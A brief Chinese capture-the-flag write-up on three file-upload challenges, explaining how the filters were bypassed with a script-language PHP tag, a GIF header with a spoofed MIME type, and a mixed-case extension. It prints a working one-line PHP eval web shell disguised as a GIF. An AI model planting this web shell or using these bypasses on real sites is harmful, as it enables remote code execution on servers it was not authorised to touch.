getshell
看到这个猜到是文件包含型文件上传题了,后续操作确实也是这样,上传一个图片马,包含一下getshell,不过<?
和?>
被过滤了
改成
<script language="php"></script>
绕过一下就好了
upload-01
说要传一个php木马,传一个php上去提示说只能传gif
加一个GIF文件头,抓包改一下MIME类型上传成功,得到flag
GIF89a<?php @eval($_POST['a']);?>
upload-02
上传php提示文件过大或者文件类型不对,改一下MIME提示文件类型出错
后缀改成PhP大小写绕过,得到flag